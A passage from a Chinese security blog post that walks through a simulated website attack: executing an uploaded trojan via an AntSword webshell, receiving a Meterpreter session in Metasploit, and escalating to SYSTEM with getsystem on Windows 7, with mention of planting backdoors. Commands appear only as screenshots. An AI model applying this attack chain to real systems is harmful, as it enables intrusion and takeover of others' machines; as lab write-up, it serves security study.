<strong>执行木马</strong></p><p>msf开启监听之后，我们去蚁剑webshell执行我们上传的木马<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/%5B%29C3QY%60V%7BV%282%29TRB%40VM7SBH.png" alt=""><br> 执行之后，回到kali，我们可以看到msf目标正在回连，创建Meterpreter会话成功<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/SIL%25NM%29X3G%293%5DZ4%25S1F%28BCF.png" alt=""></p><p><strong>提权</strong></p><p>首先查看一下我们的用户权限<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/%60H_A1%29K4%5DH3FWZ8FHFQDSMP.png" alt=""><br> 发现是普通用户权限，之前我们已经在webshell观察到对方是win7系统，所以我们采用的是windows的载荷攻击<br> 我们尝试使用getsystem进行提权试试<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/6%24I2J%24V91AJ%5D8RJDYHFLMNS.png" alt=""><br> 发现直接提权成功，现在我们拥有windows最高权限system<br> 接下来我们打印一下系统信息，并且拍照对方电脑现在状态<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/J8EE_%249FD%258GQ0%28%257%60%60BX14.png" alt=""><br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/CW%7BXP%7D_1%25%5BI6P8M%40M23J4SQ.png" alt=""><br> ok，成功。</p><h1>结语</h1><p>在拿到system权限之后，我们可以干很多很多的事…例如给对方种下后门，拿来当肉鸡等等。。。<br> 这告诉我们开发网站必须注重安全，否则带来的后果是无穷大的。<br> emmm…这波有点难受。</p><p><strong>注：本博客仅供技术研究，若将其信息做其他用途，由用户承担全部法律及连带责任，本博客不承担任何法律及连带责任，请遵守中华人民共和国安全法</strong></p></div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者:</span> <span class="post-copyright-info"><a href="mailto:undefined" rel="external nofollow noreferrer">dota_st</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接:</span> <span class="post-copyright-info"><a href="https://www.wlhhlc.top/posts/46463/">https://www.wlhhlc.top/posts/46463/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明:</span> <span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="external nofollow noreferrer" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://www.wlhhlc.top" target="_blank">dota_st</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E6%B8%97%E9%80%8F/">渗透</a></div><div class="post_share"><div class="social-share" data-image="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/222.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer="defer"></script></div></div><div class="post-reward"><div class="reward-button"><i class="fas fa-qrcode"></i> 打赏<div class="reward-main"><ul class="reward-all"><li class="reward-item"><a href="https://cdn.jsdelivr.net/gh/dota-st/blog_file/mm_facetoface_collect_qrcode_1601714082856.png" rel="external nofollow noreferrer" target="_blank"><img class="post-qr-code-img" src="https://cdn.jsdelivr.net/gh/dota-st/blog_file/mm_facetoface_collect_qrcode_1601714082856.png" alt="微信"></a><div class="post-qr-code-desc">微信</div></li><li class="reward-item"><a href="https://cdn.jsdelivr.net/gh/dota-st/blog_file/1601714101044.jpg" rel="external nofollow noreferrer" target="_blank"><img class="post-qr-code-img" src="https://cdn.jsdelivr.net/gh/dota-st/blog_file/1601714101044.jpg" alt="支付宝"></a><div class="post-qr-code-desc">支付宝</div></li></ul></div></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/posts/49040/"><img class="prev-cover" src="https://blog-file-1302856486.file.myqcloud.com/%E6%96%B0bugku/9YT534K~N47CEGE%5BCM9A%25C6.png" onerror='onerror=null,src="/img/404.jpg"'><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">新版bugku平台Writeup~持续更新中</div></div></a></div><div class="next-post pull-right"><a href="/posts/37998/"><img class="next-cover" src="https://blog-file-1302856486.file.myqcloud.com/%E5%8D%B7%E7%A7%AF%E7%A5%9E%E7%BB%8F%E7%BD%91%E7%BB%9C%E7%BB%93%E5%90%88burpsuite%E5%AE%9E%E7%8E%B0%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84%E9%AA%8C%E8%AF%81%E7%A0%81%E7%88%86%E7%A0%B4/4137.jpg_wh300.jpg" onerror='onerror=null,src="/img/404.jpg"'><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">卷积神经网络结合burpsuite实现渗透测试中的验证码爆破</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i> <span>相关推荐</span></div><div class="relatedPosts-list"><div><a href="/posts/24632/" title="src漏洞挖掘实战"><img class="cover" src="https://blog-file-1302856486.file.myqcloud.com/src%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/src.webp"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-03-26</div><div class="title">src漏洞挖掘实战</div></div></a></div><div><a href="/posts/37998/" title="卷积神经网络结合burpsuite实现渗透测试中的验证码爆破"><img class="cover" src="https://blog-file-1302856486.file.myqcloud.com/%E5%8D%B7%E7%A7%AF%E7%A5%9E%E7%BB%8F%E7%BD%91%E7%BB%9C%E7%BB%93%E5%90%88burpsuite%E5%AE%9E%E7%8E%B0%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84%E9%AA%8C%E8%AF%81%E7%A0%81%E7%88%86%E7%A0%B4/4137.jpg_wh300.jpg"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2020-11-16</div><div class="title">卷积神经网络结合burpsuite实现渗透测试中的验证码爆破</div></div></a></div><div><a href="/posts/997/" title="浅谈src漏洞的批量挖掘"><img class="cover" src="https://blog-file-1302856486.file.myqcloud.com/%E6%B5%85%E8%B0%88src%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%B9%E9%87%8F%E6%8C%96%E6%8E%98/index.jpg"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-06-04</div><div class="title">浅谈src漏洞的批量挖掘</div></div></a></div></div></div></article></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2022<i id="heartbeat" class="fa fas fa-heartbeat"></i> dota_st</div><div class="framework-info"><span>dota_st</span> <span class="footer-separator">|</span><span>博客</span></div><div class="icp"><a target="_blank" rel="noopener external nofollow noreferrer" href="http://beian.miit.gov.cn"><img class="icp-icon" src="/img/icp.png"><span>琼ICP备2020003865号</span></a></div><html></html><head><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/HCLonely/images@master/others/heartbeat.min.css"></head><body><span id="sitetime"></span><script language="javascript">function siteTime(){window.setTimeout("siteTime()",1e3);var e=36e5,t=24*e,o=new Date,i=o.getFullYear(),a=o.getMonth()+1,n=o.getDate(),r=o.getHours(),l=o.getMinutes(),s=o.getSeconds(),M=Date.UTC(2020,10,4,9,0,0),g=Date.UTC(i,a,n,r,l,s)-M,m=Math.floor(g/31536e6),T=Math.floor(g/t-365*m),f=Math.floor((g-(365*m+T)*t)/e),h=Math.floor((g-(365*m+T)*t-f*e)/6e4),u=Math.floor((g-(365*m+T)*t-f*e-6e4*h)/1e3);document.getElementById("sitetime").innerHTML="小破站已在各种灾难中苟活"+m+" 年 "+T+" 天 "+f+" 小时 "+h+" 分钟 "+u+" 秒"}siteTime()</script></body></div></footer></div><section id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></section><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章" type="text"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/wzpan/hexo-generator-search" style="color:#49b1f5">hexo-generator-search</a> <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fas fa-times"></i></span></div><div id="search-mask"></div><div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="/js/search/local-search.js"></script><script>var preloader = {
  endLoading: () => {
    document.body.style.overflow = 'auto';
    document.getElementById('loading-box').classList.add("loaded")
  },
  initLoading: () => {
    document.body.style.overflow = '';
    document.getElementById('loading-box').classList.remove("loaded")

  }
}
window.addEventListener('load',()=> {preloader.endLoading()})</script><div class="js-pjax"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div><script src="https://cdn.jsdelivr.net/gh/dota-st/blog_file/background.min.js"></script><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/activate-power-mode.min.js"></script><script>POWERMODE.colorful=!0,POWERMODE.shake=!0,POWERMODE.mobile=!1,document.body.addEventListener("input",POWERMODE)</script><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.css"><script src="https://cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.js"></script><script src="https://cdn.jsdelivr.net/gh/metowolf/MetingJS@1.2/dist/Meting.min.js"></script><script src="https://cdn.jsdelivr.net/npm/pjax/pjax.min.js"></script><script>let pjaxSelectors = [
  'title',
  '#config_change',
  '#body-wrap',
  '#rightside-config-hide',
  '#rightside-config-show',
  '.js-pjax'
]

if (false) {
  pjaxSelectors.unshift('meta[property="og:image"]', 'meta[property="og:title"]', 'meta[property="og:url"]')
}

var pjax = new Pjax({
  elements: 'a:not([target="_blank"])',
  selectors: pjaxSelectors,
  cacheBust: false,
  analytics: false,
  scrollRestoration: false
})

document.addEventListener('pjax:complete', function () {
  window.refreshFn()
  window.foot_tm()
  
  $('script[data-pjax]').each(function () {
    $(this).parent().append($(this).remove())
  })

  GLOBAL_CONFIG.islazyload && window.lazyLoadInstance.update()

  typeof chatBtnFn === 'function' && chatBtnFn()
  typeof panguInit === 'function' && panguInit()

  if (typeof gtag === 'function') {
    gtag('config', '', {'page_path': window.location.pathname});
  }

  typeof loadMeting === 'function' && document.getElementsByClassName('aplayer').length && loadMeting()

  // Analytics
  if (false) {
    MtaH5.pgv()
  }

  // prismjs
  typeof Prism === 'object' && Prism.highlightAll()

  typeof preloader === 'object' && preloader.endLoading()
})


document.addEventListener('pjax:send', function () {
  typeof preloader === 'object' && preloader.initLoading()
  
  if (window.aplayers) {
    for (let i = 0; i < window.aplayers.length; i++) {
      if (!window.aplayers[i].options.fixed) {
        window.aplayers[i].destroy()
      }
    }
  }

  typeof typed === 'object' && typed.destroy()

  $(window).off('scroll')

  //reset readmode
  $('body').hasClass('read-mode') && $('body').removeClass('read-mode')

})</script></div><script src="https://cdn.jsdelivr.net/npm/live2d-widget@^3.1.3/lib/L2Dwidget.min.js"></script><script>L2Dwidget.init({pluginRootPath:"live2dw/",pluginJsPath:"lib/",pluginModelPath:"assets/",tagMode:!1,debug:!1,model:{scale:1,hHeadPos:.5,vHeadPos:.618,jsonPath:"/live2dw/assets/haruto.model.json"},display:{superSample:2,position:"right",width:150,height:300,hOffset:20,vOffset:-90},mobile:{show:!0,scale:1},react:{opacityDefault:.3,opacityOnHover:.3,opacity:.95},log:!1})</script></body></html>